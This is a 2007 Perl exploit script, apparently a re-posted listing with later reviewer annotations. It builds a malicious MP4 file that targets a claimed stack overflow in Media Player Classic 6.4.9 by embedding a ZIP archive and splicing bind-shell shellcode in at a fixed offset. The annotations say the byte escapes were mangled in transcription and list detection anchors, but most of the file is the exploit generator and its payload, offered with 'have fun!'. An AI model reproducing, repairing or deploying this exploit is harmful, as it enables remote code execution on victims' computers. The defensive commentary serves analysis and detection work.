mpc-overflow.txt
Posted on 09 December 2007
#!/bin/perl
#
# Media Player Classic 6.4.9 MP4 Stack Overflow
#
# 0-day discovered and exploited by SYS 49152
#
# Tested on win XP SP2 ENG
# Shell on port 49152
#
# usage:
# - download this codec in order to manage MP4 content:
# http://www.3ivx.com/coral/3ivx_d4_451_win.exe
#
# - open the MP4 file with mplayerc.exe
#
# SYS 49152
# gforce(put the @ here)operamail(put the . here)com
#
# update:
# the latest 5.0.1 codec is still vulnerable
#
# --- Reviewer notes (defender's reading of this listing) ---
#
# What the script does, as written: it writes an embedded ZIP archive to
# ./tempzip.zip, extracts the single member SYS_49152_MP4_for_MPC.mp4
# into the current directory, then reopens that file read/write and
# overwrites it in place from byte offset 619 with the contents of
# $shellcode.  Everything in the header above (the affected player
# version, the codec dependency, the listener on port 49152) is the
# original author's claim; nothing in the code below verifies it.
#
# Transcription caveat: in this copy every "\xNN" escape in the two byte
# strings has lost its backslash, so the literals are plain ASCII text
# ("x50x4B...") rather than the intended bytes.  As shown, the script
# cannot produce a valid archive, and the extract step is not expected
# to succeed; treat the listing as a historical record, not a runnable
# tool.  The code is kept byte-identical here for that reason.
#
# Detection anchors grounded in this file: the fixed artifact names
# tempzip.zip and SYS_49152_MP4_for_MPC.mp4 (the member name is also
# visible in clear inside $zip_data), and the fixed in-band patch offset
# 619 in the produced MP4.  Mitigation belongs on the player side (the
# claimed defect is in MPC's MP4 handling); the generator itself only
# touches the working directory.
#
# Style, for the record: no `use strict`/`use warnings`, a bareword
# filehandle (`code`), 2-arg open() with the mode baked into the string,
# `||` instead of low-precedence `or` after open(), and Archive::Zip
# return codes are never checked.

use Archive::Zip qw( :ERROR_CODES :CONSTANTS );

# Undeclared package global (no strictures).  Intended content: a ZIP
# archive -- the leading 50 4B 03 04 is the local-file-header signature,
# the 50 4B 01 02 / 50 4B 05 06 records near the end are the central
# directory and its end record (entry count 1), and the member name
# bytes spell SYS_49152_MP4_for_MPC.mp4.  See the transcription caveat
# above: as written these are literal "xNN" characters, not bytes.
$zip_data = # code 724981
"x50x4Bx03x04x14x00x00x00x08x00xB3xB1x30x36xF3".
"x13xD9x53x73x02x00x00x57x04x00x00x19x00x00x00".
"x53x59x53x5Fx34x39x31x35x32x5Fx4Dx50x34x5Fx66".
"x6Fx72x5Fx4Dx50x43x2Ex6Dx70x34x63x60x60xBFx9C".
"x9Bx9Fx5FxC6xC0xC0x90x93x5Bx96x91x02xA4x19x0E".
"xBCxF1x2Bx3BxF0x26x2Cx99x81x81xF9x05x88xCFxC0".
"x08x46x08x80xC2xC1xE4x3Bx30xE0x05x40xD5xECxF1".
"xA5x29x25x89x40x3Ax3Cx37x15x44x83x81x62x46x4A".
"x4Ex11x4Cx51x6Ex4Ax66x51x62x41x41x0Ex92x3Ex76".
"xADxCCx9CxE2x12x20x43x62x65x5Ex62x2Ex90x16x48".
"x49x04x6Bx86x59x2FxB1xB2xBCxA8x04xABxB8x63x50".
"x08x56xF1xC4x9Cx24x4Cx71x36xF3x95xC9xB9x40x73".
"x98x6Fx21x8Bx4Fx40x02xACx4Cx8CxBExBAx8Cx8CxBE".
"x0ExBEx0Dx37x80x04x90x62x85x50x8Cx10xCAx01x42".
"x75x41xA8x06x08x55x0AxA1x58x20x14x37x84xFAxE4".
"xFBx9Ax0CxD0x9Dx16xEExE0xCCxF1xB3xA4xE3xF5x84".
"x41x03x5ExBFx16xCDx99xE0x3AxD1x97x95x05x12x36".
"x01xBEx87x83x23x83x4Dx2Cx0Dx4Dx8Dx14x82x42x7D".
"x5CxA3x14x8Dx4Fx36xBFxDCx70xF3xDDxCDx12x95x2F".
"xD1x8DxC5xC2x2Bx5CxBFxEEx68x7ExFDxE7xD1x97x10".
"x7DxB9xAFx0Ex7BxB8xDCxC3x55xEBxAExF4x24xD6xFD".
"x9Dx72xAEx73xEFx05x17x29xE3xE7xB1x75xCFx3Bx5C".
"xE4x3Ex2Ax17xD6xEDx74x2Bx31x55x64x39x68x7Ax66".
"x7Dx8BxFDxD6x95xEDx72x3Ex93x05x2Fx4ExB8xBBxA0".
"xEEx79x8Fx8BxDCx3Dx65xCFx7DxC6xDFx23xBFx04xAF".
"xCExACx33x3Cx92xF8xF2x66x76x89xDEx1Dx65xB6xA3".
"xC6x2Fx3CxEBx4Ex6Cx79x51xF7x63x81xF4x5CxB3x67".
"xDEx92x2FxC2x27x4Fx7Ex7Dx4ExF7x58xD7x01xA3xB6".
"xAExEFx82x5Cx19x07xFAx24x5Cx26x8Bx72xE5x7Dx3F".
"x23x70x4Fx73xC5xDFx5Dx7FxF5xBFxBBx57xE8xEAx6C".
"x8Cx7DxB1xC8xBDx4Ex6CxD9xEBxDFx62xDBx5ExBFx16".
"xE3xCAx38xA7x6BxBAxE3x9Cx58x4DxA4xADx6ExE0xA2".
"x1Bx4Dx40x39xFDxA7x2FxFFxEEx52xBDxC0xF3xE2x76".
"xE0xFFx5DxCAxAFx41x6Cx5Fx9ExE2x8Fx40xF6x8Bx3F".
"x82x0BxDCx2BxAExCDx8DxBFxD8xDCxF3x3Ex7Cx32x90".
"xADx3CxFFxCEx39xDDx69x57x15x17xCCx7FxF1x31xC7".
"xD2xD0x5Fx7FxA3xA1x57x89xA9x37xD3xEExEDx53xC3".
"xD8x6Fx6AxABxDAx9Fx15x66x7Ex37xF7x54xD8xB7xC7".
"xEEx77x19xB9xF2x3Ex0Bx2Dx7FxF9x53x64xFExCEx9F".
"x22x0Bx5Ex86x4Fx9Dx2Bx5AxE8x60xFDx3Ax7CxF2x7C".
"xF7xF0x22xAEx0Cx65x21x4ExEBx1Cx45xAExBCx5Fx40".
"xFBxDCxBBx45x6FxFCxDExA5xECx5Ex01x0CxC4x52x70".
"x52x4Ex4FxCDxC3x92xC4x15x4Ax8AxB2x41xE2x12x50".
"x71x74xA0x90x92x59x9Cx8Dx47x5ExAAx24xB7x20x1F".
"x48x0Bx41xE5x45xE1x32x92xC9x05x99xA0xDCx29x88".
"x2ExC3x91x0Bx14x01x00x50x4Bx01x02x14x00x14x00".
"x00x00x08x00xB3xB1x30x36xF3x13xD9x53x73x02x00".
"x00x57x04x00x00x19x00x00x00x00x00x00x00x00x00".
"x20x00x00x00x00x00x00x00x53x59x53x5Fx34x39x31".
"x35x32x5Fx4Dx50x34x5Fx66x6Fx72x5Fx4Dx50x43x2E".
"x6Dx70x34x50x4Bx05x06x00x00x00x00x01x00x01x00".
"x47x00x00x00xAAx02x00x00x00x00";

# Opaque payload copied from the original post; it is spliced into the
# extracted MP4 at offset 619 below.  The header claims it opens a
# listener on port 49152 -- not analysed or verified here.  Same
# transcription caveat as $zip_data applies.
my $shellcode = # code 724981
"x33xC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13".
"xA8x45xF5xB8x83xEBxFCxE2xF4x54x2Fx1ExF5x40xBC".
"x0Ax47x57x25x7ExD4x8Cx61x7ExFDx94xCEx89xBDxD0".
"x44x1Ax33xE7x5Dx7ExE7x88x44x1ExF1x23x71x7ExB9".
"x46x74x35x21x04xC1x35xCCxAFx84x3FxB5xA9x87x1E".
"x4Cx93x11xD1x90xDDxA0x7ExE7x8Cx44x1ExDEx23x49".
"xBEx33xF7x59xF4x53xABx69x7Ex31xC4x61xE9xD9x6B".
"x74x2ExDCx23x06xC5x33xE8x49x7ExC8xB4xE8x7ExF8".
"xA0x1Bx9Dx36xE6x4Bx19xE8x57x93x93xEBxCEx2DxC6".
"x8AxC0x32x86x8AxF7x11x0Ax68xC0x8Ex18x44x93x15".
"x0Ax6ExF7xCCx10xDEx29xA8xFDxBAxFDx2FxF7x47x78".
"x2Dx2CxB1x5DxE8xA2x47x7Ex16xA6xEBxFBx16xB6xEB".
"xEBx16x0Ax68xCEx2Dx35xB8xCEx16x7Cx59x3Dx2Dx51".
"xA2xD8x82xA2x47x7Ex2FxE5xE9xFDxBAx25xD0x0CxE8".
"xDBx51xFFxBAx23xEBxFDxBAx25xD0x4Dx0Cx73xF1xFF".
"xBAx23xE8xFCx11xA0x47x78xD6x9Dx5FxD1x83x8CxEF".
"x57x93xA0x47x78x23x9FxDCxCEx2Dx96xD5x21xA0x9F".
"xE8xF1x6Cx39x31x4Fx2FxB1x31x4Ax74x35x4Bx02xBB".
"xB7x95x56x07xD9x2Bx25x3FxCDx13x03xEEx9DxCAx56".
"xF6xE3x47xDDx01x0Ax6ExF3x12xA7xE9xF9x14x9FxB9".
"xF9x14xA0xE9x57x95x9Dx15x71x40x3BxEBx57x93x9F".
"x47x57x72x0Ax68x23x12x09x3Bx6Cx21x0Ax6ExFAxBA".
"x25xD0x47x8Bx15xD8xFBxBAx23x47x78x45xF5xB8";

# Step 1: dump the embedded archive to ./tempzip.zip (bareword handle,
# 2-arg open with the ">" mode inside the string; harmless here only
# because the name is a constant).  binmode keeps Windows from doing
# CRLF translation on what is meant to be binary data.
open(code, ">tempzip.zip") || die "Can't Write temporary File ";
binmode (code);
print code $zip_data;
close (code);

# Progress message; the trailing newline was presumably lost with the
# other backslashes in transcription.
print " Temporary file ready, patching.. ";

# Step 2: pull the single member out of the archive into the current
# directory.  Neither read() nor extractMember() has its status checked,
# so a bad archive is only noticed when the open() below fails.
my $zip = Archive::Zip->new();
$zip->read( 'tempzip.zip' ) ;
$zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' );

# Step 3: reopen the extracted MP4 read/write ("+<"), jump to absolute
# byte 619 (whence 0 = start of file) and overwrite in place with the
# payload.  The payload therefore sits in-band at a fixed offset of the
# produced file -- a stable anchor for anyone scanning for this sample.
open(code, "+<SYS_49152_MP4_for_MPC.mp4") || die "Can't Open temporary File ";
binmode (code);
seek code,619,0;
print code $shellcode;
close (code);

print "Shellcode added, have fun! ";